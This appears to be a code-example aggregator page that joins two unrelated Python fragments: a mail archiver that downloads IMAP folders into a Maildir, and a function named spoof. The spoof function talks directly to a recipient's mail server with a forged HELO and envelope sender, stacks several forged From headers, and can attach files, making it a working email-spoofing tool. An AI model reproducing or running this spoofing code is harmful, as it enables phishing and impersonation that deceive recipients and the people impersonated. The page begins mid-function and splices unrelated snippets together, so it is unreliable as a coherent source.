       folders = args.include or (set(folders_slashdelimited) - set(args.exclude))

       # Archive messages!
       logger.info("Archiving '%s' to %s" % ("', '".join(folders), args.archivedir))
       archive = mailbox.Maildir(args.archivedir)
       for foldername in folders:
           select_info = imapcon.select_folder(foldername)
           if select_info['EXISTS'] == 0:
               logger.info("Folder %s: no messages!" % foldername)
               continue

           uids = imapcon.fetch("1:%s" % select_info['EXISTS'], ['UID',])
           logger.info("Folder %s: %i messages on server" % (foldername, len(uids)))
           logger.debug("... fetching uids for 1-%s" %(select_info['EXISTS'],))

           uidvalidity = select_info['UIDVALIDITY']
           logger.debug("... UID validity: %s" % uidvalidity)

           parts = [makeFSCompatible(unicode(prt)) for prt in foldername.split(fsep)]
           fsname = '.'.join(parts)

           with mailfolder(archive, fsname) as (folder, cached_uid_info):
               newuids = [id for id in uids if ((uidvalidity, id) not in cached_uid_info)]
               oldcount, newcount = len(cached_uid_info), len(newuids)
               logger.info("... %i archived messages, %i new" % (oldcount, newcount))

               # use batched logging
               fetched = []
               interval = 1
               if len(newuids) > 100:
                   interval = int(math.sqrt(len(newuids)))
                   logger.warn("... using batched logging (entry per %i msgs)" % interval)

               for i, uid in enumerate(newuids):
                   fetch_info = imapcon.fetch(uid, ["BODY.PEEK[]",])
                   logger.debug("... info: %s" % fetch_info)
                   msg = fetch_info[uid]["BODY[]"]

                   # If a message cannot be stored, skip it instead of failing
                   try:
                       folder.add(msg)
                       cached_uid_info.append((uidvalidity,uid))
                   except Exception, e:
                       logger.error("... error storing mail: %s\n%s" %(msg,e), False)

                   fetched.append(str(uid))
                   if not (i % interval):
                       logger.info("... got message(s): %s" % ", ".join(fetched))
                       fetched = []
示例#39
0
def spoof(mail_from,
          to_email,
          subject,
          content,
          mime_from=None,
          mime_from1=None,
          mime_from2=None,
          sender=None,
          helo=None,
          filename=None):
    from_domain = get_email_domain(mail_from)
    if from_domain is None:
        logger.warn("Invalid FROM domain: " + mail_from)

    to_domain = get_email_domain(to_email)
    if to_domain is None:
        logger.warn("Invalid TO domain: " + to_email)

    mx_domain = get_mx(to_domain)
    # print("mx_domain:",mx_domain)
    if mx_domain is None:
        logger.warn("Can't not resolve mx: " + to_domain)

    # start
    smtp = Smtp(mx_domain)

    if not helo:
        helo = from_domain
    if helo:
        smtp.cmd("HELO " + helo)
    else:
        smtp.cmd("HELO " + 'test1.com')
    smtp.cmd("MAIL FROM: <{}>".format(mail_from))
    smtp.cmd("RCPT TO: <" + to_email + ">")
    smtp.cmd("DATA")
    nowdt = datetime.datetime.now()
    nowtuple = nowdt.timetuple()
    nowtimestamp = time.mktime(nowtuple)
    t = utils.formatdate(nowtimestamp)
    msg = MIMEMultipart()
    smtp.cmdonly("Date: {}".format(t))
    if mime_from1:
        smtp.cmdonly("From: {}".format(mime_from1))
    smtp.cmdonly("From: {}".format(mime_from))
    if mime_from2:
        smtp.cmdonly("From: {}".format(mime_from2))
    if sender:
        smtp.cmdonly("Sender: {}".format(sender))
    smtp.cmdonly("To: <{}>".format(to_email))
    subject = Header(subject, "UTF-8").encode()
    smtp.cmdonly("Subject: {}".format(subject))

    msg['Date'] = t
    msg['From'] = mime_from
    msg['To'] = to_email
    msg['Subject'] = subject
    smtp.cmdonly('Content-Type: text/plain; charset="utf-8"')
    smtp.cmdonly("MIME-Version: 1.0")
    _attach = MIMEText(content, 'utf-8')
    msg.attach(_attach)
    if filename:
        att1 = MIMEText(
            open('./uploads/' + filename, 'rb').read(), 'base64', 'utf-8')
        att1["Content-Type"] = 'application/octet-stream'
        att1["Content-Disposition"] = 'attachment; filename="{}"'.format(
            filename)
        # content = msg.as_string()+att1.as_string()
        msg.attach(att1)
    # else:
    #     content = msg.as_string()
    content = msg.as_string()
    # smtp.cmdonly("")
    smtp.cmdonly(content)
    smtp.cmd(".")
    smtp.cmd("quit")
    smtp.interact()